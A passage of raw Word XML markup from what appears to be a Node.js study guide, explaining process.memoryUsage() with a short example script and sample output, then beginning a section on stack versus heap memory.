          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>external</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014392C" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Represents the memory used by C++ objects bound to JavaScript objects, such as those created by native add-ons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E211FF" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This includes memory allocated by Node.js's native bindings and libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D92248"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rPr>
        <w:t>Example Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604D1EF" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here’s a simple example demonstrating how to use process.memoryUsage():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449FF218"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Print initial memory usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47176BB1"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console.log('Initial memory usage:', process.memoryUsage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B517F" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C25A11"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Simulate some memory usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12060B5B"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largeArray = new Array(1e6).fill('some data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE58FC" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED8747E"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Print memory usage after allocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9E169"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console.log('Memory usage after allocation:', process.memoryUsage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49589A" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D8F586"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Clean up and print memory usage again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FC688"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largeArray.length = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8039BB"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console.log('Memory usage after cleanup:', process.memoryUsage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28338B1C"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rPr>
        <w:t>Output Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29276950"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Initial memory usage: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFE7BE"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rss: 53912576,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A6160"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heapTotal: 25722880,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F269BA9"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heapUsed: 10453056,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E5891"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external: 1193170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28089908"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CE38006"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Memory usage after allocation: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB36841"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rss: 69544960,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B36C0A"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heapTotal: 25722880,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544A129"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heapUsed: 20933032,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E78087"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external: 1193170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703AA4B0"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4CCF8A3"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Memory usage after cleanup: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166B5311"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rss: 69544960,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E8274"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heapTotal: 25722880,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF565B"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heapUsed: 10453056,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960E66F" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E"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external: 1193170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3574F017"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22B6BEF"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rPr>
        <w:t>Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D897E7" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Represents the total memory allocated for the process and can be higher than the heap size due to additional memory used by the process itself and the V8 engine's overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4837DC" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Sizes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Monitoring heapTotal and heapUsed can help you understand how efficiently your application is using the V8 heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393BC94" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>External Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Track external to understand how much memory is being used by native add-ons or other non-JavaScript components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B64271" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Diagnostics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FF098" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Regular Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use process.memoryUsage() to log memory usage at different points in your application to detect potential leaks or excessive memory consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205DE7B0" w14:textId="77777777" w:rsidR="00870D7E" w:rsidRPr="00DA2F32" w:rsidRDefault="00870D7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Profiling</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Combine memory usage metrics with heap snapshots and profiling tools to get a comprehensive view of your application's memory behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A466CE9" w14:textId="77777777" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF0F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F91A5C" w14:textId="1ACCD82D" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc178383273"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between stack memory and heap memory in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="0E3F0100" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22162815" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for static memory allocation, which involves memory allocation for local variables and function call information. It's managed in a last-in, first-out (LIFO) manner, meaning that the most recently added item is the first one to be removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C6141" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBDA39" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EF8DDB" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Typically, stack memory is smaller compared to heap memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3921D989" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The size is fixed and limited, defined by the system or runtime environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3217A" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocation/Deallocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274834D1" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocation and deallocation are very fast because they follow a simple LIFO order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181EF432" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory is automatically managed; when a function is called, its local variables are allocated on the stack, and when the function returns, the memory is automatically freed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768AD377" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF6A00" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack memory is used for variables that are local to a function or block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F25FE4" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Once the function or block exits, the memory is reclaimed and the variables are no longer accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045551CC" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lifetime</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582FB9C7" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
